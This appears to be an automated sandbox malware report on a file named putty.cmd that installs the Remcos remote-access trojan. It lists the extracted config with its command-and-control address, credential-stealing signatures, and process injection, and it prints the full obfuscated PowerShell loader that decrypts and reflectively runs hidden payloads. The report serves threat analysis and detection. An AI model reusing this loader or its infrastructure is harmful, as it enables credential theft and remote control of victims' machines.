Analysis
-
max time kernel
130s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-03-2024 15:30
Static task
static1
Behavioral task
behavioral1
Sample
putty.cmd
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
putty.cmd
Resource
win10v2004-20240226-en
General
-
Target
putty.cmd
-
Size
7.4MB
-
MD5
606bc44bc3ce1ab5bec05a295ac81089
-
SHA1
d95631873a15d6bf4c031ddf70052d438f5dbd83
-
SHA256
3a9a4d649cb72b41d0fe035a5d24c0c317463e019ab35fceca0d9a52c988642c
-
SHA512
c234ea302f4c3197436beb8d21955abeb6dedf0e1439cd2330428cf40a7b21e3ef7ecd9a71823d3391b441d0b428a8e86d4606192a91db934bdf7df6982e87d0
-
SSDEEP
196608:l77777777777777777777777777777777777777777777777777777777777777g:u
Malware Config
Extracted
remcos
RemoteHost
91.92.251.30:2025
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-L2QP3G
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1920-71-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral2/memory/1920-73-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1700-65-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral2/memory/1700-79-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1700-65-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1920-71-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1920-73-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4544-76-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4544-77-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1700-79-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 31 4868 powershell.exe 36 4868 powershell.exe 37 4868 powershell.exe 38 4868 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 4868 set thread context of 1700 4868 powershell.exe powershell.exe PID 4868 set thread context of 1920 4868 powershell.exe powershell.exe PID 4868 set thread context of 4544 4868 powershell.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3924 4868 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4868 powershell.exe 4868 powershell.exe 3788 powershell.exe 3788 powershell.exe 1700 powershell.exe 1700 powershell.exe 4544 powershell.exe 4544 powershell.exe 1700 powershell.exe 1700 powershell.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exepid process 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 4272 wrote to memory of 3596 4272 cmd.exe cmd.exe PID 4272 wrote to memory of 3596 4272 cmd.exe cmd.exe PID 3596 wrote to memory of 2360 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 2360 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 4868 3596 cmd.exe powershell.exe PID 3596 wrote to memory of 4868 3596 cmd.exe powershell.exe PID 3596 wrote to memory of 4868 3596 cmd.exe powershell.exe PID 4868 wrote to memory of 3788 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 3788 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 3788 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4900 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4900 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4900 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1700 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1700 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1700 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1700 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1920 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1920 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1920 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1920 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1112 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1112 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 1112 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4544 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4544 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4544 4868 powershell.exe powershell.exe PID 4868 wrote to memory of 4544 4868 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\putty.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\putty.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\putty.cmd';$KUZI='EleMrJamenMrJatMrJaAtMrJa'.Replace('MrJa', ''),'SrASbplrASbitrASb'.Replace('rASb', ''),'DcxuUecocxuUmpcxuUrescxuUscxuU'.Replace('cxuU', ''),'EnzKXdtzKXdrzKXdyzKXdPoizKXdntzKXd'.Replace('zKXd', ''),'CDKRroDKRrpDKRryTDKRroDKRr'.Replace('DKRr', ''),'CremHyIatemHyIDmHyIecmHyIrmHyIymHyIpmHyItomHyIrmHyI'.Replace('mHyI', ''),'LqXKhoadqXKh'.Replace('qXKh', ''),'FibFsromibFsBibFsasibFse6ibFs4SibFstibFsriibFsngibFs'.Replace('ibFs', ''),'MIkMWaIkMWiIkMWnMIkMWodIkMWulIkMWeIkMW'.Replace('IkMW', ''),'GEhZzetEhZzCEhZzuEhZzrrEhZzeEhZzntEhZzProEhZzcesEhZzsEhZz'.Replace('EhZz', ''),'InvYoJVokYoJVeYoJV'.Replace('YoJV', ''),'ChalJqNnlJqNgelJqNElJqNxtlJqNelJqNnslJqNiolJqNnlJqN'.Replace('lJqN', ''),'ReaHsIkdLiHsIknHsIkeHsIksHsIk'.Replace('HsIk', ''),'TyKjzranyKjzsyKjzforyKjzmFyKjziyKjznayKjzlBlyKjzockyKjz'.Replace('yKjz', '');powershell -w hidden;function DzchL($QfpjG){$iBRSE=[System.Security.Cryptography.Aes]::Create();$iBRSE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iBRSE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iBRSE.Key=[System.Convert]::($KUZI[7])('TYzwx+VQruSBclwTSei5OE5DbGGUAEnGVbMuihV8YQU=');$iBRSE.IV=[System.Convert]::($KUZI[7])('+LTXnHvK40EXoqLlqGzCsw==');$sGXqE=$iBRSE.($KUZI[5])();$riXCa=$sGXqE.($KUZI[13])($QfpjG,0,$QfpjG.Length);$sGXqE.Dispose();$iBRSE.Dispose();$riXCa;}function bmuCI($QfpjG){$PkJst=New-Object System.IO.MemoryStream(,$QfpjG);$TpSCv=New-Object System.IO.MemoryStream;$vgnKN=New-Object System.IO.Compression.GZipStream($PkJst,[IO.Compression.CompressionMode]::($KUZI[2]));$vgnKN.($KUZI[4])($TpSCv);$vgnKN.Dispose();$PkJst.Dispose();$TpSCv.Dispose();$TpSCv.ToArray();}$nUBNG=[System.IO.File]::($KUZI[12])([Console]::Title);$aWeUY=bmuCI (DzchL ([Convert]::($KUZI[7])([System.Linq.Enumerable]::($KUZI[0])($nUBNG, 5).Substring(2))));$PFrnG=bmuCI (DzchL ([Convert]::($KUZI[7])([System.Linq.Enumerable]::($KUZI[0])($nUBNG, 6).Substring(2))));[System.Reflection.Assembly]::($KUZI[6])([byte[]]$PFrnG).($KUZI[3]).($KUZI[10])($null,$null);[System.Reflection.Assembly]::($KUZI[6])([byte[]]$aWeUY).($KUZI[3]).($KUZI[10])($null,$null); "3⤵PID:2360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\cqvmsuwupumnkivxohgxoxf"4⤵PID:4900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\cqvmsuwupumnkivxohgxoxf"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\eliwtmhndcesmwjbxstqrcaxfu"4⤵
- Accesses Microsoft Outlook accounts
PID:1920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\pnnpufsprkwxxcfngcgscpmoobteq"4⤵PID:1112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\pnnpufsprkwxxcfngcgscpmoobteq"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 25124⤵
- Program crash
PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4868 -ip 48681⤵PID:1792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5ec0cf9ff722f9a9259c3338972c40886
SHA131bad5285affb58c5ebe0569bbdb9bd1deab245c
SHA25630190665467845aed54732c31c7e385368c10acb595cffdd7ca9523fff051a19
SHA512bdfaf9576db431d3c4d14e0ea5deafce661fceda6d5123a6f4b84d50a576dd1ccf4202091dc0b55bed665dd45b4e30d2a797bda6015b06f5771064f9bab32d1a